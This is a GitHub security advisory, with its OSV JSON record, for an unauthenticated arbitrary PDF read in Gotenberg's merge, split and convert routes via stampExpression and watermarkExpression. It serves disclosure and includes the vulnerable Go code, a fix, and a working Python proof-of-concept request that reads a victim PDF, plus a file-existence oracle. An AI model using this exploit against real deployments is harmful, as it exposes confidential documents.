GHSA-3CV5-Q585-H563

Vulnerability from github – Published: 2026-05-07 00:59 – Updated: 2026-05-14 20:52
Summary
Gotenberg has arbitrary PDF read via stampExpression and watermarkExpression in merge, split, and convert routes
Details

Summary

Six conversion routes (pdfengines/merge, pdfengines/split, libreoffice/convert, chromium/convert/url, chromium/convert/html, chromium/convert/markdown) accept stampSource=pdf with stampExpression=/path, and watermarkSource=pdf with watermarkExpression=/path, from anonymous callers. The dedicated stamp/watermark routes require an uploaded file when the source type is image or pdf. These six routes instead overwrite the expression only when a file is uploaded, so the user-controlled path is left intact when no file is attached. pdfcpu opens that path and composites its pages onto the output PDF, which is returned to the caller. An attacker can therefore read any PDF that the Gotenberg process can access on the container filesystem.

Details

The dedicated stamp route at pkg/modules/pdfengines/routes.go:1322-1332 rejects requests missing the stamp file:

if stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {
    if stampFile == "" {
        return api.WrapError(errors.New("no stamp file provided"), ...)
    }
    stamp.Expression = stampFile
}

The merge, split, LibreOffice, and Chromium routes use a lax pattern across twelve call sites (six stamp + six watermark):

// pkg/modules/pdfengines/routes.go:679-683 (merge), 803-807 (split);
// pkg/modules/libreoffice/routes.go:307-311;
// pkg/modules/chromium/routes.go:433-438, 508-513, 592-597
if (stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF) && stampFile != "" {
    stamp.Expression = stampFile
}
if (watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF) && watermarkFile != "" {
    watermark.Expression = watermarkFile
}

When stampFile == "" (no file attached to the stamp form field), the guard short-circuits and stamp.Expression keeps the raw user-supplied stampExpression form string. The same pattern applies to watermarkFile/watermarkExpression.
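
The short-circuit can be reproduced in isolation. The following is a minimal sketch, not Gotenberg's code: the Source and Overlay types and the laxResolve function are hypothetical stand-ins for the project's stamp/watermark structures, and the upload path is made up for illustration.

```go
package main

import "fmt"

// Source is a hypothetical stand-in for gotenberg's stamp source constants.
type Source string

const (
	SourceImage Source = "image"
	SourcePDF   Source = "pdf"
)

// Overlay holds the two fields relevant to the bug (hypothetical type).
type Overlay struct {
	Source     Source
	Expression string // starts out as the raw form value
}

// laxResolve reproduces the vulnerable pattern: the expression is replaced
// only when a file was uploaded, so an empty uploadedFile leaves the
// caller-supplied path in place.
func laxResolve(o Overlay, uploadedFile string) Overlay {
	if (o.Source == SourceImage || o.Source == SourcePDF) && uploadedFile != "" {
		o.Expression = uploadedFile
	}
	return o
}

func main() {
	fromForm := Overlay{Source: SourcePDF, Expression: "/tmp/victim_doc.pdf"}

	// No file attached: the form-supplied path survives untouched.
	fmt.Println(laxResolve(fromForm, "").Expression)

	// File attached: the expression is replaced by the staged upload path.
	fmt.Println(laxResolve(fromForm, "/tmp/work/stamp.pdf").Expression)
}
```

In the first call nothing overwrites the attacker-chosen path, which is the state the vulnerable routes hand to the PDF engine.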

pkg/modules/pdfcpu/pdfcpu.go:635 forwards the expression straight to the pdfcpu CLI:

args := []string{"stamp", "add", "-mode", "pdf", "--", stamp.Expression, onDesc, inputPath, outputPath}
cmd, err := gotenberg.CommandContext(ctx, logger, cfg.BinPath, args...)

pdfcpu reads the target PDF at that path and composites its pages as a stamp on every page of the merged output.
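
To make the data flow concrete, the sketch below rebuilds the argument slice quoted above and prints each element. buildStampArgs is a hypothetical helper, and the description, input, and output values are placeholders rather than values Gotenberg actually passes.

```go
package main

import "fmt"

// buildStampArgs is a hypothetical helper mirroring the argument slice quoted
// from pkg/modules/pdfcpu/pdfcpu.go; it only builds the slice and runs nothing.
func buildStampArgs(expression, onDesc, inputPath, outputPath string) []string {
	return []string{"stamp", "add", "-mode", "pdf", "--", expression, onDesc, inputPath, outputPath}
}

func main() {
	// The first argument is the attacker-supplied stampExpression form value;
	// the remaining values are placeholders for illustration.
	args := buildStampArgs("/tmp/victim_doc.pdf", "<description>", "/tmp/in.pdf", "/tmp/out.pdf")
	for i, a := range args {
		fmt.Printf("args[%d] = %q\n", i, a)
	}
}
```

The expression lands in the position that pdfcpu treats as the stamp source file. The `--` separator conventionally stops a value from being parsed as an option, but it places no restriction on which path that value names.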

Proof of Concept

The following reproduces the issue on the stock Docker image. The scenario models a deployment that mounts host paths into the container (common for document-processing pipelines), or one where another request leaves a PDF in the shared /tmp filesystem:

docker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8
docker exec gotenberg-poc sh -c 'cat > /tmp/victim_doc.pdf' < victim.pdf

Where victim.pdf contains extractable text such as BOB-CONFIDENTIAL-CONTRACT-2026-04-20.

Alice attacks without auth:

import requests, io, subprocess
T = "http://localhost:3000"

minimal = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
           b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
           b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\nendobj\n"
           b"xref\n0 4\n0000000000 65535 f \n0000000009 00000 n \n"
           b"0000000058 00000 n \n0000000115 00000 n \n"
           b"trailer\n<< /Size 4 /Root 1 0 R >>\nstartxref\n180\n%%EOF\n")

r = requests.post(
    f"{T}/forms/pdfengines/merge",
    files={"file1": ("a.pdf", io.BytesIO(minimal), "application/pdf"),
           "file2": ("b.pdf", io.BytesIO(minimal), "application/pdf")},
    data={"stampSource": "pdf", "stampExpression": "/tmp/victim_doc.pdf"},
    timeout=30,
)
print(f"HTTP {r.status_code} bytes={len(r.content)}")
# Close the file before pdftotext reads it.
with open("/tmp/out.pdf", "wb") as f:
    f.write(r.content)
print(subprocess.run(["pdftotext", "/tmp/out.pdf", "-"],
                     capture_output=True, text=True).stdout)

Observed output against gotenberg 8.31.0:

HTTP 200 bytes=1852
BOB-CONFIDENTIAL-CONTRACT-2026-04-20
...

Non-PDF targets via stampSource=pdf (for example /etc/hostname) return HTTP 500 after pdfcpu fails to parse the file as PDF, which acts as a file-existence oracle. stampSource=image with non-image files returns HTTP 400 (image parsing rejects it). The same PoC applies with stampSource replaced by watermarkSource and stampExpression by watermarkExpression.

Impact

Any anonymous caller with access to port 3000 reads PDF files from any path the Gotenberg process can open. In the default Docker image with no volume mounts, the reachable set is limited to /tmp/<gotenberg-work-uuid>/<request-uuid>/*.pdf (files staged during another in-flight request) and any PDF files the base image happens to ship. In deployments that bind-mount host directories into the container (document processing pipelines, shared storage for Office document conversion), the attacker reads arbitrary PDF files under those mount points. The file-existence oracle additionally lets the attacker probe for the presence of non-PDF files anywhere the process can read.

Recommended Fix

Apply the dedicated stamp route's guard to all six stamp call sites and all six watermark call sites:

if stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {
    if stampFile == "" {
        return api.WrapError(
            errors.New("no stamp file provided for image or pdf source"),
            api.NewSentinelHttpError(http.StatusBadRequest,
                "Invalid form data: a stamp file is required for image or pdf source"),
        )
    }
    stamp.Expression = stampFile
}
if watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF {
    if watermarkFile == "" {
        return api.WrapError(
            errors.New("no watermark file provided for image or pdf source"),
            api.NewSentinelHttpError(http.StatusBadRequest,
                "Invalid form data: a watermark file is required for image or pdf source"),
        )
    }
    watermark.Expression = watermarkFile
}

Call sites: pkg/modules/pdfengines/routes.go:679-683 (merge), :803-807 (split), pkg/modules/libreoffice/routes.go:307-311, pkg/modules/chromium/routes.go:433-438 (url), :508-513 (html), :592-597 (markdown), plus each route's watermark counterpart.


Found by aisafe.io

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gotenberg/gotenberg/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "8.31.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42593"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T00:59:50Z",
    "nvd_published_at": "2026-05-14T16:16:22Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nSix conversion routes (`pdfengines/merge`, `pdfengines/split`, `libreoffice/convert`, `chromium/convert/url`, `chromium/convert/html`, `chromium/convert/markdown`) accept `stampSource=pdf` + `stampExpression=/path` and `watermarkSource=pdf` + `watermarkExpression=/path` from anonymous callers. The dedicated stamp/watermark routes require an uploaded file when the source type is image or pdf; these six routes only overwrite the expression when a file is uploaded, leaving the user-controlled path intact when no file is attached. pdfcpu opens the path and composites its pages onto the output PDF, which returns to the caller. An attacker reads any PDF the Gotenberg process can access on the container filesystem.\n\n## Details\n\nThe dedicated stamp route at `pkg/modules/pdfengines/routes.go:1322-1332` rejects requests missing the stamp file:\n\n```go\nif stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {\n    if stampFile == \"\" {\n        return api.WrapError(errors.New(\"no stamp file provided\"), ...)\n    }\n    stamp.Expression = stampFile\n}\n```\n\nThe merge, split, LibreOffice, and Chromium routes use a lax pattern across twelve call sites (six stamp + six watermark):\n\n```go\n// pkg/modules/pdfengines/routes.go:679-683 (merge), 803 (split);\n// pkg/modules/libreoffice/routes.go:307-311;\n// pkg/modules/chromium/routes.go:433-438, 508-513, 592-597\nif (stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF) \u0026\u0026 stampFile != \"\" {\n    stamp.Expression = stampFile\n}\nif (watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF) \u0026\u0026 watermarkFile != \"\" {\n    watermark.Expression = watermarkFile\n}\n```\n\nWhen `stampFile == \"\"` (no file attached to the `stamp` form field), the guard short-circuits and `stamp.Expression` keeps the raw user-supplied `stampExpression` form string. 
The same pattern applies to `watermarkFile`/`watermarkExpression`.\n\n`pkg/modules/pdfcpu/pdfcpu.go:635` forwards the expression straight to the pdfcpu CLI:\n\n```go\nargs := []string{\"stamp\", \"add\", \"-mode\", \"pdf\", \"--\", stamp.Expression, onDesc, inputPath, outputPath}\ncmd, err := gotenberg.CommandContext(ctx, logger, cfg.BinPath, args...)\n```\n\npdfcpu reads the target PDF at that path and composites its pages as a stamp on every page of the merged output.\n\n## Proof of Concept\n\nReproduction on the stock Docker image. The scenario models a deployment that mounts host paths into the container (common for document-processing pipelines) or where another request leaves a PDF in the shared `/tmp` filesystem:\n\n```bash\ndocker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8\ndocker exec gotenberg-poc sh -c \u0027cat \u003e /tmp/victim_doc.pdf\u0027 \u003c victim.pdf\n```\n\nWhere `victim.pdf` contains extractable text such as `BOB-CONFIDENTIAL-CONTRACT-2026-04-20`.\n\nAlice attacks without auth:\n\n```python\nimport requests, io, subprocess\nT = \"http://localhost:3000\"\n\nminimal = (b\"%PDF-1.4\\n1 0 obj\\n\u003c\u003c /Type /Catalog /Pages 2 0 R \u003e\u003e\\nendobj\\n\"\n           b\"2 0 obj\\n\u003c\u003c /Type /Pages /Kids [3 0 R] /Count 1 \u003e\u003e\\nendobj\\n\"\n           b\"3 0 obj\\n\u003c\u003c /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] \u003e\u003e\\nendobj\\n\"\n           b\"xref\\n0 4\\n0000000000 65535 f \\n0000000009 00000 n \\n\"\n           b\"0000000058 00000 n \\n0000000115 00000 n \\n\"\n           b\"trailer\\n\u003c\u003c /Size 4 /Root 1 0 R \u003e\u003e\\nstartxref\\n180\\n%%EOF\\n\")\n\nr = requests.post(\n    f\"{T}/forms/pdfengines/merge\",\n    files={\"file1\": (\"a.pdf\", io.BytesIO(minimal), \"application/pdf\"),\n           \"file2\": (\"b.pdf\", io.BytesIO(minimal), \"application/pdf\")},\n    data={\"stampSource\": \"pdf\", \"stampExpression\": \"/tmp/victim_doc.pdf\"},\n    
timeout=30,\n)\nprint(f\"HTTP {r.status_code} bytes={len(r.content)}\")\nopen(\"/tmp/out.pdf\", \"wb\").write(r.content)\nprint(subprocess.run([\"pdftotext\", \"/tmp/out.pdf\", \"-\"],\n                     capture_output=True, text=True).stdout)\n```\n\nObserved output against gotenberg 8.31.0:\n\n```\nHTTP 200 bytes=1852\nBOB-CONFIDENTIAL-CONTRACT-2026-04-20\n...\n```\n\nNon-PDF targets via `stampSource=pdf` (for example `/etc/hostname`) return HTTP 500 after pdfcpu fails to parse the file as PDF, which acts as a file-existence oracle. `stampSource=image` with non-image files returns HTTP 400 (image parsing rejects it). The same PoC applies with `stampSource` replaced by `watermarkSource` and `stampExpression` by `watermarkExpression`.\n\n## Impact\n\nAny anonymous caller with access to port 3000 reads PDF files from any path the Gotenberg process can open. In the default Docker image with no volume mounts, the reachable set is limited to `/tmp/\u003cgotenberg-work-uuid\u003e/\u003crequest-uuid\u003e/*.pdf` (files staged during another in-flight request) and any PDF files the base image happens to ship. In deployments that bind-mount host directories into the container (document processing pipelines, shared storage for Office document conversion), the attacker reads arbitrary PDF files under those mount points. 
The file-existence oracle additionally lets the attacker probe for the presence of non-PDF files anywhere the process can read.\n\n## Recommended Fix\n\nApply the dedicated stamp route\u0027s guard to all six stamp call sites and all six watermark call sites:\n\n```go\nif stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {\n    if stampFile == \"\" {\n        return api.WrapError(\n            errors.New(\"no stamp file provided for image or pdf source\"),\n            api.NewSentinelHttpError(http.StatusBadRequest,\n                \"Invalid form data: a stamp file is required for image or pdf source\"),\n        )\n    }\n    stamp.Expression = stampFile\n}\nif watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF {\n    if watermarkFile == \"\" {\n        return api.WrapError(\n            errors.New(\"no watermark file provided for image or pdf source\"),\n            api.NewSentinelHttpError(http.StatusBadRequest,\n                \"Invalid form data: a watermark file is required for image or pdf source\"),\n        )\n    }\n    watermark.Expression = watermarkFile\n}\n```\n\nCall sites: `pkg/modules/pdfengines/routes.go:679-683` (merge), `:803-807` (split), `pkg/modules/libreoffice/routes.go:307-311`, `pkg/modules/chromium/routes.go:433-438` (url), `:508-513` (html), `:592-597` (markdown), plus each route\u0027s watermark counterpart.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-3cv5-q585-h563",
  "modified": "2026-05-14T20:52:32Z",
  "published": "2026-05-07T00:59:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-3cv5-q585-h563"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42593"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gotenberg/gotenberg"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gotenberg has arbitrary PDF read via stampExpression and watermarkExpression in merge, split, and convert routes"
}

